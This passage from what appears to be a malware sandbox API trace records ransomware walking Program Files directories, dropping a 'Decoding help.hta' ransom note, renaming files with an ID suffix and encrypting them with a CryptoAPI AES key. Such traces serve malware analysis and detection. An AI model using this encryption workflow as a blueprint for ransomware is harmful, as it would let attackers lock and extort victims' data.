lstrcmpiW (lpString1="windows", lpString2="Windows Photo Viewer") returned -1 [0038.750] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\*.*") returned="\\\\?\\C:\\Program Files\\*.*" [0038.750] lstrlenW (lpString="\\\\?\\C:\\Program Files\\*.*") returned 24 [0038.750] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\", lpString2="Windows Photo Viewer" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Photo Viewer") returned="\\\\?\\C:\\Program Files\\Windows Photo Viewer" [0038.750] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Photo Viewer", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\*.*" [0038.750] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x9310048, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1a8 [0038.751] CloseHandle (hObject=0x1a8) returned 1 [0038.751] FindNextFileW (in: hFindFile=0x5a53f0, lpFindFileData=0x380fd30 | out: lpFindFileData=0x380fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x987bf1ac, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x987bf1ac, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Portable Devices", cAlternateFileName="WIBFE5~1")) returned 1 [0038.751] lstrcmpW (lpString1=".", lpString2="Windows Portable Devices") returned -1 [0038.751] lstrcmpW (lpString1="..", lpString2="Windows Portable Devices") returned -1 [0038.751] lstrcmpiW (lpString1="windows", lpString2="Windows Portable Devices") returned -1 [0038.753] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\*.*") returned="\\\\?\\C:\\Program Files\\*.*" [0038.753] lstrlenW (lpString="\\\\?\\C:\\Program Files\\*.*") returned 24 [0038.753] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\", lpString2="Windows Portable Devices" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Portable Devices") returned="\\\\?\\C:\\Program Files\\Windows Portable Devices" [0038.753] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Portable Devices", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Portable Devices\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Portable Devices\\*.*" [0038.753] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x93280b0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1a8 [0038.753] CloseHandle (hObject=0x1a8) returned 1 [0038.753] FindNextFileW (in: hFindFile=0x5a53f0, lpFindFileData=0x380fd30 | out: lpFindFileData=0x380fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1052bf50, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x1052bf50, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Sidebar", cAlternateFileName="WI4223~1")) returned 1 [0038.753] lstrcmpW (lpString1=".", lpString2="Windows Sidebar") returned -1 [0038.754] lstrcmpW (lpString1="..", lpString2="Windows Sidebar") returned -1 [0038.754] lstrcmpiW (lpString1="windows", lpString2="Windows Sidebar") returned -1 [0038.755] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\*.*") returned="\\\\?\\C:\\Program Files\\*.*" [0038.755] lstrlenW (lpString="\\\\?\\C:\\Program Files\\*.*") returned 24 [0038.755] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\", lpString2="Windows Sidebar" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar") returned="\\\\?\\C:\\Program Files\\Windows Sidebar" [0038.755] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\*.*" [0038.755] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x9340118, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1a8 [0038.756] CloseHandle (hObject=0x1a8) returned 1 [0038.756] FindNextFileW (in: hFindFile=0x5a53f0, lpFindFileData=0x380fd30 | out: lpFindFileData=0x380fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1052bf50, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x1052bf50, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Sidebar", cAlternateFileName="WI4223~1")) returned 0 [0038.756] FindClose (in: hFindFile=0x5a53f0 | out: hFindFile=0x5a53f0) returned 1 Thread: id = 18 os_tid = 0xa7c [0038.537] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\*.*", lpFindFileData=0x394fd30 | out: lpFindFileData=0x394fd30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x10f11a30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x10f11a30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a52b0 [0038.537] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0038.537] FindNextFileW (in: hFindFile=0x5a52b0, lpFindFileData=0x394fd30 | out: lpFindFileData=0x394fd30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x10f11a30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x10f11a30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0038.537] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0038.537] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0038.537] FindNextFileW (in: hFindFile=0x5a52b0, lpFindFileData=0x394fd30 | out: lpFindFileData=0x394fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cf40b40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x1052bf50, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x1052bf50, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Adobe", cAlternateFileName="")) returned 1 [0038.537] lstrcmpW (lpString1=".", lpString2="Adobe") returned -1 [0038.537] lstrcmpW (lpString1="..", lpString2="Adobe") returned -1 [0038.537] lstrcmpiW (lpString1="windows", lpString2="Adobe") returned 1 [0038.539] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\*.*" [0038.539] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\*.*") returned 30 [0038.539] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\", lpString2="Adobe" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Adobe") returned="\\\\?\\C:\\Program Files (x86)\\Adobe" [0038.539] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Adobe", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Adobe\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Adobe\\*.*" [0038.539] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x34283f0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1b8 [0038.558] CloseHandle (hObject=0x1b8) returned 1 [0038.558] FindNextFileW (in: hFindFile=0x5a52b0, lpFindFileData=0x394fd30 | out: lpFindFileData=0x394fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xbdc44680, ftLastAccessTime.dwHighDateTime=0x1d301bd, ftLastWriteTime.dwLowDateTime=0xbdc44680, ftLastWriteTime.dwHighDateTime=0x1d301bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Common Files", cAlternateFileName="COMMON~1")) returned 1 [0038.558] lstrcmpW (lpString1=".", lpString2="Common Files") returned -1 [0038.558] lstrcmpW (lpString1="..", lpString2="Common Files") returned -1 [0038.558] lstrcmpiW (lpString1="windows", lpString2="Common Files") returned 1 [0038.559] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\*.*" [0038.559] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\*.*") returned 30 [0038.559] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\", lpString2="Common Files" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files") returned="\\\\?\\C:\\Program Files (x86)\\Common Files" [0038.559] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\*.*" [0038.559] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x4118180, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1b8 [0038.573] CloseHandle (hObject=0x1b8) returned 1 [0038.573] FindNextFileW (in: hFindFile=0x5a52b0, lpFindFileData=0x394fd30 | out: lpFindFileData=0x394fd30*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x286e4016, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x286e4016, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28ae853d, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0038.573] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Program Files (x86)\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\*.*" [0038.573] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\*.*") returned 30 [0038.573] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Decoding help.hta" [0038.573] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Decoding help.hta" (normalized: "c:\\program files (x86)\\decoding help.hta")) returned 0xffffffff [0038.574] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Decoding help.hta" (normalized: "c:\\program files (x86)\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8 [0038.574] WriteFile (in: hFile=0x1b8, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x394fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x394fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0038.576] CloseHandle (hObject=0x1b8) returned 1 [0038.576] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0038.576] lstrcmpiW (lpString1="Decoding help.hta", lpString2="desktop.ini") returned -1 [0038.576] lstrlenW (lpString="desktop.ini") returned 11 [0038.576] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\*.*" [0038.576] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\*.*") returned 30 [0038.576] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\", lpString2="desktop.ini" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\desktop.ini") returned="\\\\?\\C:\\Program Files (x86)\\desktop.ini" [0038.576] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\desktop.ini" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\desktop.ini") returned="\\\\?\\C:\\Program Files (x86)\\desktop.ini" [0038.576] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\desktop.ini", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]" [0038.576] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\desktop.ini" (normalized: "c:\\program files (x86)\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\desktop.ini.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0038.577] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\desktop.ini.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8 [0038.577] CreateFileMappingA (hFile=0x1b8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x1a4 [0038.577] CryptAcquireContextA (in: phProv=0x394fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x394fcec*=0x5a7c68) returned 1 [0038.578] CryptGenKey (in: hProv=0x5a7c68, Algid=0x6610, dwFlags=0x1, phKey=0x394fce8 | out: phKey=0x394fce8*=0x5a5330) returned 1 [0038.578] CryptExportKey (in: hKey=0x5a5330, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x394fbe4, pdwDataLen=0x394fce4 | out: pbData=0x394fbe4*, pdwDataLen=0x394fce4*=0x2c) returned 1 [0038.578] MapViewOfFile (hFileMappingObject=0x1a4, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xa0) returned 0x2d0000 [0038.579] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x394fbe4*, pdwDataLen=0x394fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x394fbe4*, pdwDataLen=0x394fcf8*=0x100) returned 1 [0038.579] CryptEncrypt (in: hKey=0x5a5330, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2d0000*, pdwDataLen=0x394fce4*=0xa0, dwBufLen=0xa0 | out: pbData=0x2d0000*, pdwDataLen=0x394fce4*=0xa0) returned 1 [0038.579] UnmapViewOfFile (lpBaseAddress=0x2d0000) returned 1 [0038.579] CloseHandle (hObject=0x1a4) returned 1 [0038.580] CryptDestroyKey (hKey=0x5a5330) returned 1 [0038.580] CryptReleaseContext (hProv=0x5a7c68, dwFlags=0x0) returned 1 [0038.580] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0038.580] WriteFile (in: hFile=0x1b8, lpBuffer=0x394fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x394fcf8, lpOverlapped=0x0 | out: lpBuffer=0x394fbe4*, lpNumberOfBytesWritten=0x394fcf8*=0x100, lpOverlapped=0x0) returned 1 [0038.580] WriteFile (in: hFile=0x1b8, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x394fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x394fcf8*=0x500, lpOverlapped=0x0) returned 1 [0038.581] CloseHandle (hObject=0x1b8) returned 1 [0038.582] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0038.582] FindNextFileW (in: hFindFile=0x5a52b0, lpFindFileData=0x394fd30 | out: lpFindFileData=0x394fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c82ea80, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x1046d870, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x1046d870, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Google", cAlternateFileName="")) returned 1 [0038.582] lstrcmpW (lpString1=".", lpString2="Google") returned -1 [0038.582] lstrcmpW (lpString1="..", lpString2="Google") returned -1 [0038.582] lstrcmpiW (lpString1="windows", lpString2="Google") returned 1 [0038.583] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\*.*" [0038.583] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\*.*") returned 30 [0038.583] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\", lpString2="Google" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Google") returned="\\\\?\\C:\\Program Files (x86)\\Google" [0038.583] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Google", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Google\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Google\\*.*" [0038.583] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x4178320, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1b8 [0038.594] CloseHandle (hObject=0x1b8) returned 1 [0038.595] FindNextFileW (in: hFindFile=0x5a52b0, lpFindFileData=0x394fd30 | out: lpFindFileData=0x394fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8f7490, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1ea40f84, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea40f84, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Internet Explorer", cAlternateFileName="INTERN~1")) returned 1 [0038.595] lstrcmpW (lpString1=".", lpString2="Internet Explorer") returned -1 [0038.595] lstrcmpW (lpString1="..", lpString2="Internet Explorer") returned -1 [0038.595] lstrcmpiW (lpString1="windows", lpString2="Internet Explorer") returned 1 [0038.596] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\*.*" [0038.596] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\*.*") returned 30 [0038.596] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\", lpString2="Internet Explorer" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer" [0038.596] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*" [0038.596] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x41d84c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1b8 [0038.606] CloseHandle (hObject=0x1b8) returned 1 [0038.606] FindNextFileW (in: hFindFile=0x5a52b0, lpFindFileData=0x394fd30 | out: lpFindFileData=0x394fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x734f7d60, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x10505df0, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x10505df0, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Java", cAlternateFileName="")) returned 1 [0038.606] lstrcmpW (lpString1=".", lpString2="Java") returned -1 [0038.606] lstrcmpW (lpString1="..", lpString2="Java") returned -1 [0038.606] lstrcmpiW (lpString1="windows", lpString2="Java") returned 1 [0038.607] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\*.*" [0038.607] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\*.*") returned 30 [0038.607] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\", lpString2="Java" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Java") returned="\\\\?\\C:\\Program Files (x86)\\Java" [0038.607] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Java", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Java\\*.*" [0038.607] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x4238660, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1b8 [0038.618] CloseHandle (hObject=0x1b8) returned 1 [0038.618] FindNextFileW (in: hFindFile=0x5a52b0, lpFindFileData=0x394fd30 | out: lpFindFileData=0x394fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1ae930, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa1ae930, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa1ae930, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Analysis Services", cAlternateFileName="MICROS~2")) returned 1 [0038.618] lstrcmpW (lpString1=".", lpString2="Microsoft Analysis Services") returned -1 [0038.618] lstrcmpW (lpString1="..", lpString2="Microsoft Analysis Services") returned -1 [0038.618] lstrcmpiW (lpString1="windows", lpString2="Microsoft Analysis Services") returned 1 [0038.619] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\*.*" [0038.619] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\*.*") returned 30 [0038.619] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\", lpString2="Microsoft Analysis Services" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services" [0038.619] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\*.*" [0038.620] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5bd0048, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1b8 [0038.629] CloseHandle (hObject=0x1b8) returned 1 [0038.629] FindNextFileW (in: hFindFile=0x5a52b0, lpFindFileData=0x394fd30 | out: lpFindFileData=0x394fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xef0a44f0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xef0a44f0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xef0a44f0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Office", cAlternateFileName="MICROS~1")) returned 1 [0038.629] lstrcmpW (lpString1=".", lpString2="Microsoft Office") returned -1 [0038.630] lstrcmpW (lpString1="..", lpString2="Microsoft Office") returned -1 [0038.630] lstrcmpiW (lpString1="windows", lpString2="Microsoft Office") returned 1 [0038.631] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\*.*" [0038.631] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\*.*") returned 30 [0038.631] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\", lpString2="Microsoft Office" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Office") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Office" [0038.631] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Office", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\*.*" [0038.631] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5c48250, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1b8 [0038.642] CloseHandle (hObject=0x1b8) returned 1 [0038.642] FindNextFileW (in: hFindFile=0x5a52b0, lpFindFileData=0x394fd30 | out: lpFindFileData=0x394fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x10f11a30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x1120b5b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1120b5b0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Visual Studio 8", cAlternateFileName="MICROS~3")) returned 1 [0038.642] lstrcmpW (lpString1=".", lpString2="Microsoft Visual Studio 8") returned -1 [0038.642] lstrcmpW (lpString1="..", lpString2="Microsoft Visual Studio 8") returned -1 [0038.642] lstrcmpiW (lpString1="windows", lpString2="Microsoft Visual Studio 8") returned 1 [0038.643] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\*.*" [0038.643] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\*.*") returned 30 [0038.643] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\", lpString2="Microsoft Visual Studio 8" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8" [0038.643] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files 